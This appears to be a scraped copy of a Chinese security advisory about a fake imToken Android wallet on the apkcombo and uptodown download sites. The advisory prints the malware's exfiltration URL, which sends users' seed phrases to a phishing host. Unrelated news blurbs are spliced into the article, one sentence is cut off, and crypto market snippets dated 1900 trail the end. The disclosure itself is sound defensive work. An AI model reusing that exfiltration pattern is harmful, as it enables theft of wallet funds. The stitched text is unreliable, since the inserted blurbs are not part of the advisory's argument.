原文作者:?山&耀
技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。
当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包“登录”;这与我们传统意义上的“登录”不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行“登录”,我们可以看到“登录”钱包时显示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而钱包是你在Web3世界中的唯一通行证。
慢雾:过去一周Web3因安全事件损失约265万美元:7月17日消息,慢雾发推称,2023年7月10日至7月16日期间,Web3发生5起安全事件,总损失为265.5万美元,包括Arcadia Finance、Rodeo Finance、LibertiVault、Platypus、Klever。[2023/7/17 10:59:08]
俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。
在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?
慢雾:苹果发布可导致任意代码执行的严重漏洞提醒,请及时更新:7月11日消息,慢雾首席信息安全官23pds发推称,近日苹果发布严重漏洞提醒,官方称漏洞CVE-2023-37450可以在用户访问恶意网页时导致在你的设备上任意代码执行,据信这个已经存在被利用的情况,任意代码危害严重,请及时更新。[2023/7/11 10:47:05]
据数据统计站点similarweb统计,apkcombo站点:
全球排名:?1,?809?
国家排名:?7,?370?
品类排名:?168?
我们可以看到它的影响力和流量都非常大。
它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:
慢雾:Poly Network再次遭遇黑客攻击,黑客已获利价值超439万美元的主流资产:金色财经报道,据慢雾区情报,Poly Network再次遭遇黑客攻击。分析发现,主要黑客获利地址为0xe0af…a599。根据MistTrack团队追踪溯源分析,ETH链第一笔手续费为Tornado Cash: 1 ETH,BSC链手续费来源为Kucoin和ChangeNOW,Polygon链手续费来源为FixedFloat。黑客的使用平台痕迹有Kucoin、FixedFloat、ChangeNOW、Tornado Cash、Uniswap、PancakeSwap、OpenOcean、Wing等。
截止目前,部分被盗Token (sUSD、RFuel、COOK等)被黑客通过Uniswap和PancakeSwap兑换成价值122万美元的主流资产,剩余被盗资金被分散到多条链60多个地址中,暂未进一步转移,全部黑客地址已被录入慢雾AML恶意地址库。[2023/7/2 22:13:22]
那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?
动态 | 慢雾:10 月发生多起针对交易所的提币地址劫持替换攻击:据慢雾区块链威胁情报(BTI)系统监测及慢雾 AML 数据显示,过去的 10 月里发生了多起针对数字货币交易所的提币地址劫持替换攻击,手法包括但不限于:第三方 JS 恶意代码植入、第三方 NPM 模块污染、Docker 容器污染。慢雾安全团队建议数字货币交易所加强风控措施,例如:1. 密切注意第三方 JS 链接风险;2. 提币地址应为白名单地址,添加时设置双因素校验,用户提币时从白名单地址中选择,后台严格做好校验。此外,也要多加注意内部后台的权限控制,防止内部作案。[2019/11/1]
我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:
https://play.google.com/store/apps/details??id=im.token.app
由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。
而apkcombo镜像站的下载路径为:
https://apkcombo.com/downloader/#package=im.token.app
上图我们可以发现,apkcombo提供的版本为24.9.11?,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。
在编写本文时imToken钱包的最新版本为2.11.3?,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。
如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。
同时我们发现类似的下载站还有如:uptodown
下载地址:https://imtoken.br.uptodown.com/android
我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:
慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。
我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:
根据逆向APK代码和实际分析流量包发现,助记词发送方式:
https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助记词>
看下图,最早的“api.funnel.rocks”证书出现在2022-06-03?,也就是攻击开始的大概时间:
俗话说一图胜千言,最后我们画一个流程图:
交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。
同时,如需使用钱包,请务必认准以下主流钱包App官方网址:
1?/imToken钱包:https://token.im/
2?/TokenPocket钱包:https://www.tokenpocket.pro/
3?/TronLink钱包:https://www.tronlink.org/
4?/比特派钱包:https://bitpie.com/
5?/MetaMask钱包:https://metamask.io/
6?/TrustWallet:https://trustwallet.com/
请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。
致谢:感谢在溯源过程中imToken官方提供的验证支持。
由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。
标签:WEBKENWEB3TOKENWeb3 ALL BEST ICOZIK TokenWEB3.0imtoken提现教程
尊敬的XT.COM用戶:因AVAX錢包升級維護,XT.COM現已暫停AVAX鏈上代幣充提業務。給您帶來的不便,請您諒解!XT交易平台将于6月16日16:16开启Pro 1期售卖:据官方消息,XT交易平台将在6月16日16:16 (UT.
1900/1/1 0:00:00在本周的市场崩盘中,Chainlink加入了其他山寨币行列。到目前为止,价格下跌了大约15%,但价格仍在区间内。如果当前的看涨模式继续发挥作用,它可能会跳出盒子.
1900/1/1 0:00:00随着收益下降,DAI可能成为稳定币,投资者将其视为避风港。其他人会加入这个过程吗? 公众呺:Web3团子 大地址一直在寻找DAI作为其他稳定币的替代品。尽管供应量增加,但代币仍面临竞争.
1900/1/1 0:00:00上周,由于获利了结,我们看到山寨币价格下跌。大多数加密货币下跌了10-15%。然而,本周似乎看好XRP等几种山寨币,它们可能会结束与SEC的法律纠纷,并有望赢得胜利。我们为您提供了一份提供良好交易机会的前5大山寨币列表.
1900/1/1 0:00:00尊敬的用戶:由於FAX節點升級,Hotcoin現已暫停FAX充值、提現業務,交易不受影響,具體開放時間敬請留意官方公告.
1900/1/1 0:00:00一位广受关注的加密货币分析师表示,大型实体正在使用看涨的以太坊(ETH)交易员作为退出市场的流动性.
1900/1/1 0:00:00